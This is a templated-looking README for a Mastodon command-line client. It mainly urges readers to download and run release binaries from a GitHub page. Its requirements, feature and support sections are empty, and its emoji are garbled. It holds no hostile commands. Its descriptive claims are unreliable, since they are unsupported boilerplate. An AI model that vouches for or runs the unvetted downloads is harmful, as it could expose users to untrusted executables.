Lucas Jaider Ricardo

πŸ¦‡ MastodonCLI - Effortlessly Manage Your Mastodon Account

πŸš€ Getting Started

Welcome to MastodonCLI! This tool helps you interact with your Mastodon account through your command line, making it easy to manage posts, follow users, and explore the world of Mastodon without needing a web interface.

πŸ’» System Requirements

To run MastodonCLI, you need:

Download MastodonCLI

πŸ“₯ Download & Install

To get started, visit the Releases page to download the latest version of MastodonCLI: https://github.com/LucasJaider/MastodonCLI/releases.

  1. Open your web browser and go to the link above.
  2. Look for the latest version of MastodonCLI.
  3. Click on the download link appropriate for your operating system (Windows, macOS, Linux).
  4. Save the file to a location on your computer you can easily access later.

πŸ› οΈ Installation Instructions

For Windows Users

  1. Locate the downloaded file, which will typically end with .exe.
  2. Double-click the file to start the installation.
  3. Follow the prompts in the installer.
  4. Once installed, open Command Prompt to start using MastodonCLI.

For macOS Users

  1. Locate the downloaded file, typically in your Downloads folder, ending with .tar.gz.
  2. Open Terminal.
  3. Use the cd command to navigate to the Downloads folder (e.g., cd ~/Downloads).
  4. Extract the file using the command tar -xzvf [filename].tar.gz (replace [filename] with the actual file name).
  5. Change to the extracted directory using cd [extracted-folder].
  6. Run the application with ./MastodonCLI.

For Linux Users

  1. Locate the downloaded file, often ending with .tar.gz, in your Downloads directory.
  2. Open a Terminal window.
  3. Change to the Downloads directory using cd ~/Downloads.
  4. Extract the file with tar -xzvf [filename].tar.gz (replace [filename] with the actual file name).
  5. Enter the directory created with cd [extracted-folder].
  6. Grant execute permission with chmod +x MastodonCLI.
  7. Run the application by typing ./MastodonCLI.

βš™οΈ Configuration

  1. To start using MastodonCLI, you need an access token for your Mastodon account.
  2. Visit your Mastodon account settings and navigate to the β€œApplications” section.
  3. Create a new application and copy the access token provided.
  4. Open MastodonCLI in your command line.
  5. Enter your token when prompted.

🌍 Using MastodonCLI

MastodonCLI lets you perform various functions:

πŸ“– Help & Support

For assistance, you can refer to the following resources:

πŸ—£οΈ Contributing

If you want to contribute to MastodonCLI, feel free to open a pull request. Improvement ideas are welcome, as well as documentation updates or feature requests.

Visit this page to download: https://github.com/LucasJaider/MastodonCLI/releases.

Thank you for choosing MastodonCLI! Enjoy managing your Mastodon experience from the command line with ease.